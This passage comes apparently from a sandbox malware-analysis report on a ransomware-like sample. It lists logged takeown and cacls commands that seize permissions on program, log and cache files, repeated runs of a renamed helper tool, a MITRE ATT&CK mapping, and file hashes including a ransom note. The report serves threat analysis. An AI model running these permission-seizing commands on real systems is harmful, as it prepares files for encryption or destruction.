PID:3460

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
1⤵
PID:8160

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
1⤵
PID:7452

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:5880

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:2352

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
1⤵
PID:6460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "wab.exe" -nobanner
1⤵
PID:3616
- C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
  qL02HjdX.exe -accepteula "wab.exe" -nobanner
  2⤵
  PID:6664

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
PID:3844

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "BrowserCore.exe" -nobanner
1⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:6276

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
1⤵
- Modifies file permissions
PID:3884

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
1⤵
PID:3704

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "wabmig.exe" -nobanner
1⤵
PID:5788
- C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
  qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
  2⤵
  PID:7444

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "manifest.json" -nobanner
1⤵
PID:8064

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:5640

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:5580

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Mail\wab.exe"
1⤵
- Modifies file permissions
PID:7672

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:6392
- C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
  qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
  2⤵
  PID:5808

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:3324

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:7600

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:7496

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:6888

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "BrowserCore.exe.mui" -nobanner
1⤵
PID:7360

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:8036

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
1⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "Workflow.Targets" -nobanner
1⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:844

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:6524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:6612

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
1⤵
- Modifies file permissions
PID:2612

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
1⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:6516

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "ImagingDevices.exe" -nobanner
1⤵
PID:4536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe" -nobanner
1⤵
PID:1940

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
1⤵
PID:7136

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:6536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:7436

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
PID:1852

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.75a1645f-fdf7-490a-a1bc-44eed3ba3e28.1.etl"
1⤵
- Modifies file permissions
PID:7512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "Identity-H" -nobanner
1⤵
PID:3140
- C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
  qL02HjdX.exe -accepteula "Identity-H" -nobanner
  2⤵
  PID:6172

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "MoUsoCoreWorker.357c6337-0e71-496d-aa02-07a028cd6f4c.1.etl" -nobanner
1⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "MoUsoCoreWorker.357c6337-0e71-496d-aa02-07a028cd6f4c.1.etl" -nobanner
1⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:5176

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1816

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
1⤵
- Modifies file permissions
PID:8172

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:6460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:6392

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
PID:7112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "KnownGameList.bin" -nobanner
1⤵
PID:6868

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
1⤵
- Modifies file permissions
PID:3976

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
1⤵
PID:4712

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:7828

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.357c6337-0e71-496d-aa02-07a028cd6f4c.1.etl"
1⤵
- Modifies file permissions
PID:6880

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.357c6337-0e71-496d-aa02-07a028cd6f4c.1.etl" /E /G Admin:F /C
1⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:5776

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"
1⤵
- Modifies file permissions
PID:4360

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C
1⤵
PID:1032

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3820

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "UpdateSessionOrchestration.75a1645f-fdf7-490a-a1bc-44eed3ba3e28.1.etl" -nobanner
1⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "UpdateSessionOrchestration.75a1645f-fdf7-490a-a1bc-44eed3ba3e28.1.etl" -nobanner
1⤵
PID:8128

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.75a1645f-fdf7-490a-a1bc-44eed3ba3e28.1.etl" /E /G Admin:F /C
1⤵
PID:4728

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
PID:7012

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:4664

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5ba0a2af-7e1c-49f3-91a4-2be07a526418.1.etl" /E /G Admin:F /C
1⤵
PID:5916

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6996

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:7688

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "MoUsoCoreWorker.5ba0a2af-7e1c-49f3-91a4-2be07a526418.1.etl" -nobanner
1⤵
PID:6732

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "0000000H.bin" -nobanner
1⤵
PID:3900

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "00000050.bin" -nobanner
1⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "NotificationUxBroker.acde0ccd-18ae-4ccd-8701-1d6d722663b5.1.etl" -nobanner
1⤵
PID:5112

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "0000006S.bin" -nobanner
1⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "00000076.bin" -nobanner
1⤵
PID:5656

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "0000007Q.bin" -nobanner
1⤵
PID:3896

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "0000008F.bin" -nobanner
1⤵
PID:868

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"
1⤵
- Modifies file permissions
PID:1480

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "000000A0.bin" -nobanner
1⤵
PID:2480

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:6428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "000000A0.bin" -nobanner
1⤵
PID:4564

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C
1⤵
PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#NOBAD_README#.rtf

Filesize
6KB

MD5
c8ed979376d4b6adcc407529b7176ae9

SHA1
8e733973eaaf606c0d6008c78ef7514f00cb621b

SHA256
1c5b287148a11cdff87c71d349ebed9aef98f5694b843592a206675d58ae2d36

SHA512
7feeda51e27bb61b5af4e75ffe45f1a5913e02d959350503abd3f407ba0582c4b3e24253f1ec84d1acb1278d740f30a7ec16a895eae54da6d16cf9657a4280c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWnLzQkw.exe

Filesize
739KB

MD5
7a334f3c09a4af25d9b94e49edb36892

SHA1
491088469f5b19c3d9dfd4f53dc77ea322bf2d00

SHA256
e4f53e03ae2648b90f9928c72091891ef4caabdd9095ebe9af742282506bfb69

SHA512
a76d9599047bf16ed31e53ed315054e655c537b217e0e5f0d308f33958e07f7d820b564fd19e7912a83de46075ec47b40a241646ebd62182ab993ef64a3f424a

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWnLzQkw.exe

Filesize
765KB

MD5
1c715807360faea81e29c167b484b90e

SHA1
aa1eab054036e761e2bf9352fc212fbeb7ca5411

SHA256
8cc220d44eaf19b1e5105fb17ef5ead022c8fa43b4192877380f20a3df24128d

SHA512
ad1c3dbd2996ded0fb279728661ac209533bf3e826f2c1aa160c0b7d682999265cee7116c019812997cd3e718bcd561c0ff763f5a9258246ab4f13cd25227ff7

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWnLzQkw.exe

Filesize
264KB

MD5
a7211e1a6465fb857bf41a7921d2939d

SHA1
d286f50ebd6945fe3c358515f91309cc6557a208

SHA256
4788c2a82c034dc338f759f7bc1d09f55416a85f87d9c5e6ea2e2a415d3e7065

SHA512
52c879d6af5db0a9cb688498610347b4927fadff0cc368e434bb0869c214be5546d21449f1ed400aa95043d62dc4d61816aa4b5363b5710dcad9a66934536aa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_443401BB5C40F14B.txt

Filesize
5KB

MD5
96b9b553962532f3261a846b23605962

SHA1
7221eacae950d08d49ee3fef943f89b0bbb4c77f

SHA256
210e2257a6aba278fbc8769900741c1c70003049f35fcbaee760788e79b834b8

SHA512
1536e69f13e5747cd3b0fab064c9fb8b155aa706aeeb0b42d2af785cdb656e08ba9789e8db6f63245d92e2ead9ccf1677e0fd61853c0046a2357d6abb2bb2fc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
74KB

MD5
06843b992912ea09712d962f8f2f2756

SHA1
3ca2f3b37029a53ca040b33f19a3f37f704fea3b

SHA256
cae3d02881daae051922dc99c69f00b79eac1b6051e01f24e216ded7e9eb659e

SHA512
e1d1840b91bc960450916f87d53d630f605f2a405f3546e62797a78c1e3d385ebadcd038121fbff2f894db5612b63e9f8305191f8105fe35a4c32e02b1cfb582

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
13KB

MD5
d5ef433d5c37c8d420d8a4cb41d36b3a

SHA1
70542fd5e8db1669ee2d289889f832ab3f9657c7

SHA256
f217aa7fb6abc8460bc9a909e4dd5c538c993da74e7d1edb28b1fe468113d132

SHA512
79dd875fab3adf6c22d2c19ccdaf73382e1007b2eb6d2a3bfe27d7edc1c4b5feee770e65bb488a098799b7a7db4a2eb44f7a0baabd8838a4d37b756c43607421

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
92KB

MD5
d53022c246dfbd5b4d3e631dde4b0bb1

SHA1
ea6121a0d26434007df64903c567d0600729f17b

SHA256
652a1e9f8097ada834b086d5b3192d554f0abbb38f4da65ace1d160746f09186

SHA512
61aef1ee33ab90968f7dfb69819b2215bb6ed131b1118e2246005464350ef49718718673b70d08a306b0d42cd713e7c6bde70f48556db991d8f85efe15b8d4a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
21KB

MD5
43df44f2c805b9c7cfec07f2a529853a

SHA1
e57d44a5e842f126d0edc22f115efd19592de463

SHA256
0bd75a9029a073e5c682b08ed41ade09af7139bc72f5103694b0767a99c04e85

SHA512
cf6f09722092352859638528f401d4aecbf29558c2a2cef3126046a29da7528cc7d1adb6ad3ac18fd09cdd1b4b69be06717732be17c153f7f41b4a6ae6b7a8e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
47KB

MD5
dd4c02393179c209de871665de3bfedf

SHA1
7a65a1770485a67b5b47f9ab9f5da9c4845f21aa

SHA256
3b2d08b693a544f6a8147ddad0bd4989e459c19c8dd68f7b8f8242df1418c276

SHA512
3bd5a84f9f21393ff4a5656e0cf8b4aecae7cd8b4f4cf0054595d544a537e37857d5f13beba402fd11556ead70267a92e9c2814a7ee88f2210bc09bcc21dbd1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
43KB

MD5
636f8d00f06d67177ae67260bae0ac42

SHA1
81745886da20ff529462560cd0ddbda8628d0e41

SHA256
67d3801f95416455094aefd6c85aaf1006409b266ff943c6bf2154b4f179ce71

SHA512
4d261e79309df35f6aeea4456f00cb9751236213ea98b6384c90caf271c41089646e5a35448b0dcfd71ccf8919ad784500085efb9d4298a9ed563286afe047f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
22KB

MD5
014507fd569658de1bdf3d2c93104ea8

SHA1
51e610f58fe79616db89b3265226f51c6d28d464

SHA256
aa3560581c8975d58d1fd090ba6f1939a5873828f9711dcf322112118dd00821

SHA512
2ea7fd6055ed74ac0d74c307c2a9946ef64b9006dff8f21021295e7151398bc71353c4f3b6f2ae3f98463aada3765f17d4fea1f9e13e29ff6970b3ab9f91cc52

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
33KB

MD5
ea85515369e4a511138a9d85f747152c

SHA1
47a672dd9954ee386295ce456928575acb47b7a7

SHA256
8db2f0fca7b90845985f00a70f41d5c9fcf831fa5064cdba18928ac3652500ba

SHA512
7a272139be40131941a36eb56c295b3c156a8dd548bbebba1263aed6fd92a79f07558072a24369d36e446a0ee92c737fe2a801e02cb1a79c30cf91570cd277a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
15KB

MD5
9a68b411449dc516feb93dfd7493e686

SHA1
9ef14ee53d6d803d2d5768b7cb2bd86a5f7bf261

SHA256
e8ab54ed506ce0eafee23b5079438fb9b5c2a341d2a630a2ff92fe6adf2b52f1

SHA512
2baab85f14552694a358d4702bec3376971836a522914949d958318b59dbab72c2f6e151f3937c24797a89860eed03937fd1121427596e399256bf5846530a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
6KB

MD5
92f6fde1bf8c33d4bea9f58ee8be677e

SHA1
aa2add4189abc6d44c6507fdf87b1e0925de77ee

SHA256
590b403ec483980214bf671306b4b5bdaac0b883829e87199315fc9cfa291e80

SHA512
273f20e148f4aba7cdd91b61a15ebff281ea2453fb23426ec31e5f4e24883816578834258c49bb8f65ef29d251244e0373d45b17d71c9f6b9be782c872356181

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
133KB

MD5
d1ac15259949aa5214e7e38371a4b0e4

SHA1
4f3ed06c4bb6c19b3068bd3149488a0436435684

SHA256
364e25f00ec7349e0b75283dca16f0028aa6ce15fa0c80ce6734df392058acbf

SHA512
42f16c5a4e702c13a262039f4732f52a0cee92545922589b4789af10390ed7e7edf1e1a8ee75cf9cb5f7504e98ee8f8fda3af9663eae5a352b26c91dfbebd382

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
156KB

MD5
ab2528e8835fbfb0dfc8d12afa30222e

SHA1
c5108b5e5f1b6bbc99bfe3f4b1cdf059320311c5

SHA256
484b1066764beb839abb4c3cea6f6fd16ab5792bda75ec5144fb689ba7930fda

SHA512
0114feb11b9a372e07091c6d982189382c301e9a58673e9d48b669b82446e23d7bdce88665f5851124e83c0f4ad660350e25fa5e3cca6adfc34ff6052fdcdea5

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
45KB

MD5
71ef756776f63abb8decf937098245d8

SHA1
360a9818731f220bd5c6a14683aa8d9d06ef8274

SHA256
9112904f76ff12a230a70296df052e31dac80b1a2a674c963ab47f19cce98728

SHA512
93205010dd8174f75113e7aa03f527c3627858ab59062ef2192f2fb269f8e80d85763f3779159140777c41f43ad14a51146a449b0b1541428048b5bfda951a42

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
147KB

MD5
c44ec8ed0b948b78dc9af75be676a726

SHA1
792f01adfb1c336d0bcae94fc08596c493a30be0

SHA256
260a5322e5df729601c7872b751e34f06d8006aead9f32e8d851e9f1948cd5e8

SHA512
198bef70e8828edefd687b4d20b3c143ea90a2e9ccdf90c21eb94edef83c01ef6cbaecd9f64ec2ac3dd57a0082e2b890170281d0313933454999dd012200303c

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
14KB

MD5
da6b6a97e1f4cfec221afecb620ef5b4

SHA1
37483c5e7e64ac44058ec271ec9f3d3f388e6231

SHA256
0e198e2965558c131178efbdd2f45f7e848a018552b1ff1a13486fc63831d270

SHA512
fba8a067e61cc5f7b883b95c170b3a0efac669a54bf7f1865eb12a54e599e81a13a268649c0fea29c113f6b6dab51096d59722679b2374c43ddaa5f8f2795f23

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
1KB

MD5
881eb955ed790003885c9aca64313083

SHA1
69b044146d006d5e65b131af1b35ecb2d11a519b

SHA256
fe1e9613b624f88941d7c3cf405e12cd960925f9dcc0f3d6e4b3d3c824529891

SHA512
291d2c3bf9d92758026fc24261885eac4269d3b6af26930f4d11073283f4f2184cbf7d0b5337fbeb052caf2ed9e4a1c090aeb8c94f1859820b63ea93a432e806

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
99KB

MD5
ddb86c7b20bb03ded6a1efa7e4c64ee1

SHA1
0dba3ac6c9dfb131d53f3437126b1241b0e2e761

SHA256
663e64208862c4d2c1a3ccdd547983eb633d7b02f740cf969ca4b6c0ebf01dd4

SHA512
0872855aa56ba5ecdf019a24aff1a23252bf7312a10d7aaca56cdcb2a891d7ba66f272914a596c799a9b66cad7bf3d75ebf19ba56152dff2775f5c1ac9682ceb

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
5KB

MD5
21de31cf437af28ff6e6eae2a81df9a2

SHA1
6478ab242205e242de9964c6db7b5aed51f6be29

SHA256
5d12add30e6257556d784d8fde9e9d61a5adecaa24df07baf798ae8c98b0401d

SHA512
f1bb9e4ff302f870903b77a8b27f69ae99f1321673fad4a6a0029b9eae67ef2fb09afaaa2866204936bd2bbafdf01e137aeae49042157846af3c9f2e858a455f

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
138KB

MD5
1cbd64223928ba490cb1cfff85e9071b

SHA1
14e40e60e9e76392f8e2bf598fc7bb356aa0d491

SHA256
45a3c42557390cd8dd1d54bd3e610120e5fb8ace95b06902ed0d304cce25951e

SHA512
9d6ff92c100a1ff0dda0871a723ae535565c793fb25dcb4fd97f5991f04210ca56a913b12e14845528f80c39d25b3555d499002dd38a1b4c21d2f406605c266a

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
7KB

MD5
b9cd8bff62ef84f3496c8fe9b1e17521

SHA1
722dc00523ea103116000c6ecb8d289175f4591d

SHA256
21aa4255155a5012098f8379dd4361b6a32ab0ae545851ec640ee2af6361a824

SHA512
6b718b9d9f9a1ad3e45ae7193023e8d2e261ed72cb8732449e4574018e2645d38e3bd158b0995a5fcb103196114757501fafae59f351ca7140ea769898392102

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
29KB

MD5
a1a7fea1daa062adaab88af300741b95

SHA1
c88618d14b46840616d46eeeacf562efcb121e06

SHA256
f14fc7140cda4aed5a19e59fab12e6fbcb97e949b368ac78d3201f0ea6e4dad1

SHA512
11c7b6975968bd4403f2e31fd4ce72038c1cc311394ea9991d818f62484e531552b33d1c10f6a8458ed1dad57405505241c412433405f98ad606b7442416f312

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
150KB

MD5
f6c9991b577fa7219d20123652d92060

SHA1
5ce3873848de2eb48e879adce21465d8c7ffdb66

SHA256
ded6b51a5a604109499885fe03320e0e724f5cc856d39b1c968fb99288878ba3

SHA512
7adae18505c19431ce238094fc5d1b432b13e96da793e416877d787ee1d9ea9f843f7a24debdd411e9d6e9bc4ae8beb5be0ef653f618fda0f6955ec9a38788fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
82KB

MD5
a80c85ee9069e10fc735229cdc96c1a5

SHA1
27afdb79e6cfa9b4388624193715a237d57194c8

SHA256
be90f89925af1332a9e182982bc58f13b7673775c18505afd421b75d60d1ffc4

SHA512
8792138bd62b959ae574f9c2aa6e04006e93a883e41d8bc1fc9eb96795ddb263f443bc0b979334257650f7ef4c989b4150137da78e95a7125efc7d0f012f8c0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
48KB

MD5
acdf21c60a495c4854bb3b3e7e6ae9be

SHA1
169496e51eb40e8c2492c9f950e10021a7a43327

SHA256
e062ec56d91489c429397dbfe1e386b36de4a404430b8d9d5eeb9d9b2a9eaa1c

SHA512
5207d31136fad29f3dc9489f8af6e37cb03ad2bfac763bafe1c54c9c1f994ba050c764d00e309d749e000ace2cab52ff31147dbbc7c87bd6a14e34abd1128d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe

Filesize
25KB

MD5
c5b6a54337fe028524a55570cb2e9bed

SHA1
d54ec8a2d7731f253278b626f9b04372169fb463

SHA256
e88b974c824d89c8a3dd81ba76aea746bd2f92940df5bb5c3a063d30233288b3

SHA512
